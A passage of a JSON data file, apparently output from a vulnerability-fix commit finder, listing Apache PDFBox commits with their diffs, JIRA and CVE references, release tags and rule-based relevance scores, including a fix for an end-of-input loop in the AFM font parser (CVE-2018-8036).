: style;", + " COSArray array = (COSArray) annot.getDictionaryObject(COSName.LE);", + "@@ -201,3 +198,3 @@ public class FDFAnnotationLine extends FDFAnnotation", + " array = new COSArray();", + "- array.add(COSName.getPDFName(style));", + "+ array.add(COSName.getPDFName(actualStyle));", + " array.add(COSName.getPDFName(PDAnnotationLine.LE_NONE));", + "@@ -207,3 +204,3 @@ public class FDFAnnotationLine extends FDFAnnotation", + " {", + "- array.setName(0, style);", + "+ array.setName(0, actualStyle);", + " }", + "@@ -235,6 +232,3 @@ public class FDFAnnotationLine extends FDFAnnotation", + " {", + "- if (style == null)", + "- {", + "- style = PDAnnotationLine.LE_NONE;", + "- }", + "+ String actualStyle = style == null ? PDAnnotationLine.LE_NONE : style;", + " COSArray array = (COSArray) annot.getDictionaryObject(COSName.LE);", + "@@ -244,3 +238,3 @@ public class FDFAnnotationLine extends FDFAnnotation", + " array.add(COSName.getPDFName(PDAnnotationLine.LE_NONE));", + "- array.add(COSName.getPDFName(style));", + "+ array.add(COSName.getPDFName(actualStyle));", + " annot.setItem(COSName.LE, array);", + "@@ -249,3 +243,3 @@ public class FDFAnnotationLine extends FDFAnnotation", + " {", + "- array.setName(1, style);", + "+ array.setName(1, actualStyle);", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/fdf/FDFAnnotationPolyline.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/fdf/FDFAnnotationPolyline.java", + "index c7302ca1a..9b0c1fc57 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/fdf/FDFAnnotationPolyline.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/fdf/FDFAnnotationPolyline.java", + "@@ -164,6 +164,3 @@ public class FDFAnnotationPolyline extends FDFAnnotation", + " {", + "- if (style == null)", + "- {", + "- style = PDAnnotationLine.LE_NONE;", + "- }", + "+ String actualStyle = style == null ? PDAnnotationLine.LE_NONE : style;", + " COSArray array = (COSArray) annot.getDictionaryObject(COSName.LE);", + "@@ -172,3 +169,3 @@ public class FDFAnnotationPolyline extends FDFAnnotation", + " array = new COSArray();", + "- array.add(COSName.getPDFName(style));", + "+ array.add(COSName.getPDFName(actualStyle));", + " array.add(COSName.getPDFName(PDAnnotationLine.LE_NONE));", + "@@ -178,3 +175,3 @@ public class FDFAnnotationPolyline extends FDFAnnotation", + " {", + "- array.setName(0, style);", + "+ array.setName(0, actualStyle);", + " }", + "@@ -206,6 +203,3 @@ public class FDFAnnotationPolyline extends FDFAnnotation", + " {", + "- if (style == null)", + "- {", + "- style = PDAnnotationLine.LE_NONE;", + "- }", + "+ String actualStyle = style == null ? PDAnnotationLine.LE_NONE : style;", + " COSArray array = (COSArray) annot.getDictionaryObject(COSName.LE);", + "@@ -215,3 +209,3 @@ public class FDFAnnotationPolyline extends FDFAnnotation", + " array.add(COSName.getPDFName(PDAnnotationLine.LE_NONE));", + "- array.add(COSName.getPDFName(style));", + "+ array.add(COSName.getPDFName(actualStyle));", + " annot.setItem(COSName.LE, array);", + "@@ -220,3 +214,3 @@ public class FDFAnnotationPolyline extends FDFAnnotation", + " {", + "- array.setName(1, style);", + "+ array.setName(1, actualStyle);", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationLine.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationLine.java", + "index 191fde680..c188fcf12 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationLine.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationLine.java", + "@@ -159,6 +159,3 @@ public class PDAnnotationLine extends PDAnnotationMarkup", + " {", + "- if (style == null)", + "- {", + "- style = LE_NONE;", + "- }", + "+ String actualStyle = style == null ? PDAnnotationLine.LE_NONE : style;", + " COSBase base = getCOSObject().getDictionaryObject(COSName.LE);", + "@@ -168,4 +165,4 @@ public class PDAnnotationLine extends PDAnnotationMarkup", + " array = new COSArray();", + "- array.add(COSName.getPDFName(style));", + "- array.add(COSName.getPDFName(LE_NONE));", + "+ array.add(COSName.getPDFName(actualStyle));", + "+ array.add(COSName.getPDFName(PDAnnotationLine.LE_NONE));", + " getCOSObject().setItem(COSName.LE, array);", + "@@ -175,3 +172,3 @@ public class PDAnnotationLine extends PDAnnotationMarkup", + " array = (COSArray) base;", + "- array.setName(0, style);", + "+ array.setName(0, actualStyle);", + " }", + "@@ -201,6 +198,3 @@ public class PDAnnotationLine extends PDAnnotationMarkup", + " {", + "- if (style == null)", + "- {", + "- style = LE_NONE;", + "- }", + "+ String actualStyle = style == null ? PDAnnotationLine.LE_NONE : style;", + " COSBase base = getCOSObject().getDictionaryObject(COSName.LE);", + "@@ -210,4 +204,4 @@ public class PDAnnotationLine extends PDAnnotationMarkup", + " array = new COSArray();", + "- array.add(COSName.getPDFName(LE_NONE));", + "- array.add(COSName.getPDFName(style));", + "+ array.add(COSName.getPDFName(PDAnnotationLine.LE_NONE));", + "+ array.add(COSName.getPDFName(actualStyle));", + " getCOSObject().setItem(COSName.LE, array);", + "@@ -217,3 +211,3 @@ public class PDAnnotationLine extends PDAnnotationMarkup", + " array = (COSArray) base;", + "- array.setName(1, style);", + "+ array.setName(1, actualStyle);", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolyline.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolyline.java", + "index b5833f84a..327d1fdca 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolyline.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolyline.java", + "@@ -22,3 +22,2 @@ import org.apache.pdfbox.cos.COSName;", + " import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", + "-import static org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLine.LE_NONE;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDAppearanceHandler;", + "@@ -64,6 +63,3 @@ public class PDAnnotationPolyline extends PDAnnotationMarkup", + " {", + "- if (style == null)", + "- {", + "- style = LE_NONE;", + "- }", + "+ String actualStyle = style == null ? PDAnnotationLine.LE_NONE : style;", + " COSBase base = getCOSObject().getDictionaryObject(COSName.LE);", + "@@ -73,4 +69,4 @@ public class PDAnnotationPolyline extends PDAnnotationMarkup", + " array = new COSArray();", + "- array.add(COSName.getPDFName(style));", + "- array.add(COSName.getPDFName(LE_NONE));", + "+ array.add(COSName.getPDFName(actualStyle));", + "+ array.add(COSName.getPDFName(PDAnnotationLine.LE_NONE));", + " getCOSObject().setItem(COSName.LE, array);", + "@@ -80,3 +76,3 @@ public class PDAnnotationPolyline extends PDAnnotationMarkup", + " array = (COSArray) base;", + "- array.setName(0, style);", + "+ array.setName(0, actualStyle);", + " }", + "@@ -94,5 +90,5 @@ public class PDAnnotationPolyline extends PDAnnotationMarkup", + " {", + "- return ((COSArray) base).getName(0, LE_NONE);", + "+ return ((COSArray) base).getName(0, PDAnnotationLine.LE_NONE);", + " }", + "- return LE_NONE;", + "+ return PDAnnotationLine.LE_NONE;", + " }", + "@@ -106,6 +102,3 @@ public class PDAnnotationPolyline extends PDAnnotationMarkup", + " {", + "- if (style == null)", + "- {", + "- style = LE_NONE;", + "- }", + "+ String actualStyle = style == null ? PDAnnotationLine.LE_NONE : style;", + " COSBase base = getCOSObject().getDictionaryObject(COSName.LE);", + "@@ -115,4 +108,4 @@ public class PDAnnotationPolyline extends PDAnnotationMarkup", + " array = new COSArray();", + "- array.add(COSName.getPDFName(LE_NONE));", + "- array.add(COSName.getPDFName(style));", + "+ array.add(COSName.getPDFName(PDAnnotationLine.LE_NONE));", + "+ array.add(COSName.getPDFName(actualStyle));", + " getCOSObject().setItem(COSName.LE, array);", + "@@ -122,3 +115,3 @@ public class PDAnnotationPolyline extends PDAnnotationMarkup", + " array = (COSArray) base;", + "- array.setName(1, style);", + "+ array.setName(1, actualStyle);", + " }", + "@@ -136,5 +129,5 @@ public class PDAnnotationPolyline extends PDAnnotationMarkup", + " {", + "- return ((COSArray) base).getName(1, LE_NONE);", + "+ return ((COSArray) base).getName(1, PDAnnotationLine.LE_NONE);", + " }", + "- return LE_NONE;", + "+ return PDAnnotationLine.LE_NONE;", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/fdf/FDFAnnotationLine.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/fdf/FDFAnnotationPolyline.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationLine.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/PDAnnotationPolyline.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "dbc072811f7bdbe50e38a0ae8199c674d74f43f0" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "17d72c0e1d21522e7defa4e711a0c475d71c9aa4", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1532270555, + "hunks": 5, + "message": "PDFBOX-4271: set versions in the parent, as suggested by Karl Heinz Marbaise git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836443 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/fontbox/pom.xml b/fontbox/pom.xml", + "index 3da486720..dbb81390a 100644", + "--- a/fontbox/pom.xml", + "+++ b/fontbox/pom.xml", + "@@ -72,3 +72,2 @@", + " download-maven-plugin", + "- 1.3.0", + " ", + "diff --git a/parent/pom.xml b/parent/pom.xml", + "index 07a60c503..46e14e21e 100644", + "--- a/parent/pom.xml", + "+++ b/parent/pom.xml", + "@@ -257,3 +257,14 @@", + " \t ", + "-\t ", + "+ ", + "+ ", + "+ com.googlecode.maven-download-plugin", + "+ download-maven-plugin", + "+ 1.3.0", + "+ ", + "+ ", + "+ com.googlecode.maven-download-plugin", + "+ ", + "+ maven-download-plugin", + "+ 1.1.0", + "+ ", + " ", + "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", + "index 6d21fa37b..eebe9402f 100644", + "--- a/pdfbox/pom.xml", + "+++ b/pdfbox/pom.xml", + "@@ -186,3 +186,2 @@", + " download-maven-plugin", + "- 1.3.0", + " ", + "diff --git a/preflight/pom.xml b/preflight/pom.xml", + "index c8f3d5402..f62a84d9e 100644", + "--- a/preflight/pom.xml", + "+++ b/preflight/pom.xml", + "@@ -111,3 +111,2 @@", + " maven-download-plugin", + "- 1.1.0", + " ", + "@@ -160,3 +159,2 @@", + " \t\t\t\t\t\t\t\t\t\tdownload-maven-plugin", + "-\t\t\t\t\t\t\t\t\t\t[1.3.0,)", + " \t\t\t\t\t\t\t\t\t\t" + ], + "changed_files": [ + "fontbox/pom.xml", + "parent/pom.xml", + "pdfbox/pom.xml", + "preflight/pom.xml" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4271": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "496f0946198ff9dce2dbb3aabb58724e885fb540" + ] + ], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4271", + "relevance": 2 + } + ] + }, + { + "commit_id": "ac08d027fbe45be455b955e0977ba324926e6e71", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1527271355, + "hunks": 1, + "message": "PDFBOX-4227: be resilent if XMP metadata can't be read git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1832260 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "index ccc1fe5d1..da0ca4cd7 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "@@ -656,6 +656,14 @@ public class PDFMergerUtility", + " {", + "- PDStream newStream = new PDStream(destination, srcMetadata.createInputStream(), (COSName) null); ", + "- mergeInto(srcMetadata, newStream.getCOSObject(), ", + "- new HashSet(Arrays.asList(COSName.FILTER, COSName.LENGTH))); ", + "- destCatalog.getCOSObject().setItem(COSName.METADATA, newStream);", + "+ try", + "+ {", + "+ PDStream newStream = new PDStream(destination, srcMetadata.createInputStream(), (COSName) null); ", + "+ mergeInto(srcMetadata, newStream.getCOSObject(), ", + "+ new HashSet(Arrays.asList(COSName.FILTER, COSName.LENGTH))); ", + "+ destCatalog.getCOSObject().setItem(COSName.METADATA, newStream);", + "+ }", + "+ catch (IOException ex)", + "+ {", + "+ // PDFBOX-4227 cleartext XMP stream with /Flate ", + "+ LOG.error(\"Metadata skipped because it could not be read\", ex);", + "+ }", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4227": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "1cfd4aaa7c4967b693d34d7e38c06e188b0cae4f" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4227", + "relevance": 2 + } + ] + }, + { + "commit_id": "0e0252e99cbc84d2d9e3cc3e02fe76e292b4cf11", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530728532, + "hunks": 8, + "message": "PDFBOX-4242: register fonts and close them when closing the document to avoid memory leaks git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835076 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", + "index 95408142c..b60323fcf 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", + "@@ -37,2 +37,3 @@ import org.apache.commons.logging.Log;", + " import org.apache.commons.logging.LogFactory;", + "+import org.apache.fontbox.ttf.TrueTypeFont;", + " import org.apache.pdfbox.cos.COSArray;", + "@@ -136,3 +137,6 @@ public class PDDocument implements Closeable", + " private final Set fontsToSubset = new HashSet<>();", + "- ", + "+", + "+ // fonts to close when closing document", + "+ private final Set fontsToClose = new HashSet<>();", + "+", + " // Signature interface", + "@@ -875,2 +879,14 @@ public class PDDocument implements Closeable", + "+ /**", + "+ * For internal PDFBox use when creating PDF documents: register a TrueTypeFont to make sure it", + "+ * is closed when the PDDocument is closed to avoid memory leaks. Users don't have to call this", + "+ * method, it is done by the appropriate PDFont classes.", + "+ *", + "+ * @param ttf", + "+ */", + "+ public void registerTrueTypeFont(TrueTypeFont ttf)", + "+ {", + "+ fontsToClose.add(ttf);", + "+ }", + "+", + " /**", + "@@ -1415,2 +1431,8 @@ public class PDDocument implements Closeable", + "+ // close fonts", + "+ for (TrueTypeFont ttf : fontsToClose)", + "+ {", + "+ firstException = IOUtils.closeAndLogException(ttf, LOG, \"TrueTypeFont\", firstException);", + "+ }", + "+", + " // rethrow first exception to keep method contract", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "index 843a8eb0c..164a4930f 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", + "@@ -94,6 +94,15 @@ public class PDType0Font extends PDFont implements PDVectorFont", + " /**", + "- * Private. Creates a new TrueType font for embedding.", + "- */", + "+ * Private. Creates a new PDType0Font font for embedding.", + "+ *", + "+ * @param document", + "+ * @param ttf", + "+ * @param embedSubset", + "+ * @param closeTTF whether to close the ttf parameter after embedding. Must be true when the ttf", + "+ * parameter was created in the load() method, false when the ttf parameter was passed to the", + "+ * load() method.", + "+ * @param vertical", + "+ * @throws IOException", + "+ */", + " private PDType0Font(PDDocument document, TrueTypeFont ttf, boolean embedSubset,", + "- boolean closeOnSubset, boolean vertical) throws IOException", + "+ boolean closeTTF, boolean vertical) throws IOException", + " {", + "@@ -111,3 +120,3 @@ public class PDType0Font extends PDFont implements PDVectorFont", + " fetchCMapUCS2();", + "- if (closeOnSubset)", + "+ if (closeTTF)", + " {", + "@@ -116,2 +125,3 @@ public class PDType0Font extends PDFont implements PDVectorFont", + " this.ttf = ttf;", + "+ document.registerTrueTypeFont(ttf);", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDDocument.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4242": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "d837e66f3517abb4309dece5ce499c2118203a27" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4242", + "relevance": 2 + } + ] + }, + { + "commit_id": "fb480219b01736337995b191258442e0d94743a6", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530035135, + "hunks": 2, + "message": "PDFBOX-4253: cache bounds values git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834453 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/function/PDFunctionType3.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/function/PDFunctionType3.java", + "index 594cd8d1c..f5c128718 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/function/PDFunctionType3.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/function/PDFunctionType3.java", + "@@ -36,3 +36,4 @@ public class PDFunctionType3 extends PDFunction", + " private PDFunction[] functionsArray = null;", + "- ", + "+ private float[] boundsValues = null;", + "+", + " /**", + "@@ -90,3 +91,6 @@ public class PDFunctionType3 extends PDFunction", + " {", + "- float[] boundsValues = getBounds().toFloatArray();", + "+ if (boundsValues == null)", + "+ {", + "+ boundsValues = getBounds().toFloatArray();", + "+ }", + " int boundsSize = boundsValues.length;" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/function/PDFunctionType3.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4253": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "a7b91102c78d3e88873a9f8d57f33e062331aba4" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4253", + "relevance": 2 + } + ] + }, + { + "commit_id": "5753aa286c4124bf1ec8c20a7e46b75b91eb4ec7", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1532632202, + "hunks": 2, + "message": "PDFBOX-4279: avoid NPE with empty annotation color that have no colorspace git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836753 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDColor.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDColor.java", + "index 38af5c8f7..18da9a0b0 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDColor.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDColor.java", + "@@ -115,5 +115,7 @@ public final class PDColor", + " {", + "- if (colorSpace instanceof PDPattern)", + "+ if (colorSpace instanceof PDPattern || colorSpace == null)", + " {", + " // colorspace of the pattern color isn't known, so just clone", + "+ // null colorspace can happen with empty annotation color", + "+ // see PDFBOX-3351-538928-p4.pdf", + " return components.clone();" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDColor.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4279": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "e62a364cf83e55e5bcb0f5f9e5bc2ea384b95951" + ] + ], + "tags": [ + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4279", + "relevance": 2 + } + ] + }, + { + "commit_id": "68952e75f85d03f2dfa536d60b1cce7dfe842353", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1523986011, + "hunks": 5, + "message": "PDFBOX-4192: support subsampling git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1829375 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java b/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", + "index 4e5a881d7..311e3213a 100644", + "--- a/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", + "+++ b/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", + "@@ -54,2 +54,3 @@ public final class PDFToImage", + " private static final String TIME = \"-time\";", + "+ private static final String SUBSAMPLING = \"-subsampling\";", + "@@ -100,2 +101,3 @@ public final class PDFToImage", + " boolean showTime = false;", + "+ boolean subsampling = false;", + " try", + "@@ -187,2 +189,6 @@ public final class PDFToImage", + " }", + "+ else if( args[i].equals( SUBSAMPLING ) )", + "+ {", + "+ subsampling = true;", + "+ }", + " else", + "@@ -251,2 +257,3 @@ public final class PDFToImage", + " PDFRenderer renderer = new PDFRenderer(document);", + "+ renderer.setSubsamplingAllowed(subsampling);", + " for (int i = startPage - 1; i < endPage; i++)", + "@@ -303,2 +310,3 @@ public final class PDFToImage", + " + \" -time : Prints timing information to stdout\\n\"", + "+ + \" -subsampling : Activate subsampling (for PDFs with huge images)\\n\"", + " + \" : The PDF document to use\\n\";" + ], + "changed_files": [ + "tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4192": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [ + [ + "no-tag", + "540cc8ff9fc28f02a11b177c5fc036bebbbbf9ca" + ] + ], + "tags": [ + "2.0.10", + "2.0.11", + "2.0.12", + "2.0.13", + "2.0.14", + "2.0.15", + "2.0.16", + "2.0.17", + "2.0.18", + "2.0.19", + "2.0.20", + "2.0.21", + "2.0.22", + "2.0.23", + "2.0.24", + "2.0.25", + "2.0.26", + "2.0.27", + "2.0.28", + "2.0.29", + "2.0.30", + "2.0.31", + "2.0.32" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4192", + "relevance": 2 + } + ] + }, + { + "commit_id": "1e43aab90bde9264843e1271c49c1810f243b228", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1529610318, + "hunks": 4, + "message": "PDFBOX-4071, PDFBOX-4251: fix DoS (OOM) Vulnerability (CVE-2018-8036) + test git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834048 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/fontbox/src/main/java/org/apache/fontbox/afm/AFMParser.java b/fontbox/src/main/java/org/apache/fontbox/afm/AFMParser.java", + "index aaeb70954..5d89b4658 100644", + "--- a/fontbox/src/main/java/org/apache/fontbox/afm/AFMParser.java", + "+++ b/fontbox/src/main/java/org/apache/fontbox/afm/AFMParser.java", + "@@ -910,5 +910,7 @@ public class AFMParser", + " //now read the data", + "- while( !isEOL(nextByte = input.read()) )", + "+ nextByte = input.read();", + "+ while (nextByte != -1 && !isEOL(nextByte))", + " {", + "- buf.append( (char)nextByte );", + "+ buf.append((char) nextByte);", + "+ nextByte = input.read();", + " }", + "@@ -937,5 +939,7 @@ public class AFMParser", + " //now read the data", + "- while( !isWhitespace(nextByte = input.read()) )", + "+ nextByte = input.read();", + "+ while (nextByte != -1 && !isWhitespace(nextByte))", + " {", + "- buf.append( (char)nextByte );", + "+ buf.append((char) nextByte);", + "+ nextByte = input.read();", + " }" + ], + "changed_files": [ + "fontbox/src/main/java/org/apache/fontbox/afm/AFMParser.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "", + "PDFBOX-4251": "" + }, + "ghissue_refs": {}, + "cve_refs": [ + "CVE-2018-8036" + ], + "twins": [ + [ + "no-tag", + "a994cabc705ea0366de7edab1271248cf71e1221" + ], + [ + "no-tag", + "0ee190856c3b67f5d09d6e32d00951930a0dea21" + ] + ], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "SEC_KEYWORDS_IN_MESSAGE", + "message": "The commit message contains some security-related keywords: vulnerability, dos", + "relevance": 4 + }, + { + "id": "ADV_KEYWORDS_IN_FILES", + "message": "An advisory keyword is contained in the changed files: parse", + "relevance": 4 + }, + { + "id": "COMMIT_HAS_TWINS", + "message": "This commit has one or more twins.", + "relevance": 2 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071, PDFBOX-4251", + "relevance": 2 + } + ] + }, + { + "commit_id": "9409814b833b98a1e0990b961517bf369787640d", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1532621990, + "hunks": 1, + "message": "PDFBOX-4279: copyOf instead of clone in case array is too small, avoids ArrayIndexOutOfBoundsException later git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1836742 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDColor.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/color/PDColor.java", + "index c966f4dd9..38af5c8f7 100644", + "--- 